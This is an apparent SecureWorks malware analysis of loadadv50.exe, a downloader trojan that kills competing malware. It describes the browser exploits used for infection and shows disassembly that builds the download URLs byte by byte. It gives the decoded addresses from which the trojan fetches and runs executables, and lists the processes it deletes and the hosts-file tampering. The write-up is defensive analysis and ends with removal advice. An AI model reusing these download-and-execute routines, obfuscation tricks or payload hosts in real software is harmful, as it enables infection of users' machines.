Research

Competitive Malware Analysis

SecureWorks' research team has been researching an emerging trend in malware: the increasing tendency of new malware that destroys other malicious programs as part of its installation. No longer content to share the spoils of war, malware is now competing with each other for the lion's share of the prize. This is an analysis of a piece of malware in the Downloader.Trojan class. The executable is called loadadv50.exe. What follows is the method of infection, and a run-down of what the executable does.

Method of Infection

This piece of malware combines two methods in order to infect the host computer. The vulnerability is SimilarMethodNameRedir. This exploit allows the malicious code to be executed in the local zone. The next vulnerability is the IE Drag-N-Drop exploit. However, instead of tricking the user into dragging the image, they just need the user to click on the image. The script then pops up a new window, which has access to the startup folder of the local system. This will then cause the host to run the executable on next startup.

Details of the Executable

Once the executable starts it does a few cursory things, such as getting the command that was used to call the executable, retrieve the startup info, and obtain a handle for the Heap of the program to facilitate memory usage.

Then the program loads a list of hosts that competing malware may be trying to connect to. This list includes:

    n-glx.s-redirect.com
    x.full-tgp.net
    counter.sexmaniack.com
    autoescrowpay.com
    www.autoescrowpay.com
    www.awmabest.com
    www.sexfiles.nu
    awmdabest.com
    www.allforadult.com
    www.iframe.biz
    www.newiframe.biz
    newiframe.biz
    www.vesbiz.biz
    vesbiz.biz
    www.pizdato.biz
    pizdato.biz
    www.aaasexypics.com
    aaasexypics.com
    www.virgin-tgp.net
    virgin-tgp.net

It appears to store this list for future reference.

The next step it takes is to register itself as a service process so it will be restarted on each startup.

Next the program performs a sleep, after which it gets the location of the Windows Directory. This sleep is part of a loop that the executable goes into while it checks for an Internet connection.

Once it finds that an Internet connection is available, it will begin by testing to see if it can write to the windows directory. It will attempt to write the file "test" to the Windows directory, after a successful attempt, it will continue on.

The program then crafts three URLs from the source code. It does this in quite an obfuscated manner. Instead of storing it in text in the data segment, the program builds the URL one character at a time, as seen below:

    MOV DWORD PTR SS:[EBP-4],EBX
    MOV BYTE PTR SS:[EBP-44],68
    MOV BYTE PTR SS:[EBP-43],74
    MOV BYTE PTR SS:[EBP-42],74
    MOV BYTE PTR SS:[EBP-41],70
    MOV BYTE PTR SS:[EBP-40],3A
    MOV BYTE PTR SS:[EBP-3F],2F
    MOV BYTE PTR SS:[EBP-3E],2F
    MOV BYTE PTR SS:[EBP-3D],32
    MOV BYTE PTR SS:[EBP-3C],31
    MOV BYTE PTR SS:[EBP-3B],33
    MOV BYTE PTR SS:[EBP-3A],2E
    MOV BYTE PTR SS:[EBP-39],31
    MOV BYTE PTR SS:[EBP-38],35
    MOV BYTE PTR SS:[EBP-37],39
    MOV BYTE PTR SS:[EBP-36],2E
    MOV BYTE PTR SS:[EBP-35],31
    MOV BYTE PTR SS:[EBP-34],31
    MOV BYTE PTR SS:[EBP-33],37
    MOV BYTE PTR SS:[EBP-32],2E
    MOV BYTE PTR SS:[EBP-31],31
    MOV BYTE PTR SS:[EBP-30],33
    MOV BYTE PTR SS:[EBP-2F],33
    MOV BYTE PTR SS:[EBP-2E],2F
    MOV BYTE PTR SS:[EBP-2D],64
    MOV BYTE PTR SS:[EBP-2C],6B
    MOV BYTE PTR SS:[EBP-2B],70
    MOV BYTE PTR SS:[EBP-2A],72
    MOV BYTE PTR SS:[EBP-29],6F
    MOV BYTE PTR SS:[EBP-28],67
    MOV BYTE PTR SS:[EBP-27],73
    MOV BYTE PTR SS:[EBP-26],2F
    MOV BYTE PTR SS:[EBP-25],BL

In this version of the executable the urls are:

    http://213.159.117.133/dkprogs/
    http://213.159.117.133/dl/
    http://67.19.51.10/enter/access2.asp?user=borodam

From these URLs it retrieves at least four files, at the time of this writing. The files are seksdialer.exe, toolbar.txt, systime.txt, and dktibs.php. It renames each of these to sex.exe, toolbar.exe, systime.exe and dktibs.exe respectively and places them into the Windows directory structure. It does so using an confusing manner, keeping the function reference in a register, and then making calls to the register instead of the actual function, like as follows:

    MOV ESI,DWORD PTR DS:[<&WININET.Internet>
    MOV EDI,400
    CMP DWORD PTR SS:[EBP-8],5
    JGE loaddadv.00401AD3
    PUSH EBX
    PUSH 80
    PUSH 4
    PUSH EBX
    PUSH 1
    PUSH 40000000
    PUSH loaddadv.00402390
    CALL DWORD PTR DS:[<&KERNEL32.CreateFil>
    PUSH EBX
    MOV DWORD PTR SS:[EBP+10],EAX
    PUSH EBX
    PUSH EBX
    LEA EAX,DWORD PTR SS:[EBP-1FC]
    PUSH EBX
    PUSH EAX
    CALL DWORD PTR DS:[<&WININET.InternetOp>
    PUSH EBX
    PUSH EBX
    PUSH EBX
    LEA ECX,DWORD PTR SS:[EBP-FC]
    PUSH EBX
    PUSH ECX
    PUSH EAX
    MOV DWORD PTR SS:[EBP+8],EAX
    CALL DWORD PTR DS:[<&WININET.InternetOp>
    LEA ECX,DWORD PTR SS:[EBP-4]
    MOV DWORD PTR SS:[EBP+C],EAX
    PUSH ECX
    LEA ECX,DWORD PTR SS:[EBP-5FC]
    PUSH EDI
    PUSH ECX
    PUSH EAX
    CALL ESI

The first instruction moves the address of the InternetReadFile function into the ESI register. The code then opens a file handle for writing. After that it opens a connection to the Internet. The final instruction listed here calls the function in ESI, which is InternetReadFile.

The program seems to do only modest error checking. It checks for the initial Internet connection, and then afterwards only checks to make sure that the file seksdialer.exe was successfully obtained. If it was not obtained, it will try until it is successful.

After retrieving the files, it attempts to start running them. If it is unable to do so, it will exit the program. Since this file goes into startup, it will try again on next boot.

After this, the executable goes about removing competing executables. This list includes programs such as:

    telnet.exe
    loadclean.exe
    ykyrtws.exe
    printer32.exe
    printer.exe
    exdl.exe
    fnnmqi.exe
    iinstall.exe
    optimize.exe
    actalert.exe
    istsvc.exe
    Winad.exe
    WinClt.exe
    bargains.exe
    ttgkirnl.exe
    Installer2.exe
    bdi74125.exe
    powerscan.exe
    alchem.exe
    sidefind.exe
    host32.exe
    teur.exe
    usb.exe
    twink64.exe
    intronet.exe
    intron.exe
    ir.exe
    lpt.exe
    PEPEmsPE.exe
    s-PEPE.exe
    winmm64.exe
    fucker.exe
    exploit.exe
    file.exe
    bitmap.tmp
    msxmidi.exe
    services.exe

After removing these programs, it then rewrites the hosts file in the Windows directory with the hosts from above. It does the same to the /drives/etc/hosts file.

That is the run-down of the executable in a nutshell. Making a conjecture of the purpose of anti-malware parts of this code, I would assume that it removes its competitors in order to stay better hidden. It seems to target things that would give a better indicator that the host is infected, prompting the person to do a full scan of their host, and possibly finding this executable. The creator of this program did not want that to happen and so it decided not to share.

Removal Instructions


The loadadv50.exe Trojan is detectable by most leading virus scanners. To remove this Trojan, simply update the virus scanner's signatures and perform a full system scan. If detected, follow the instructions provided by the virus scanner.

Next Steps
Start With SecureWorks Request More Information Now
Call SecureWorks Call Us Today
877-905-6661

Send to a Friend

*Your Name: 
*Your Email: 
*Their Name: 
*Their Email: 
Comments:

Info Request


Newsletter Signup

* First Name:
* Last Name:
* Email Address: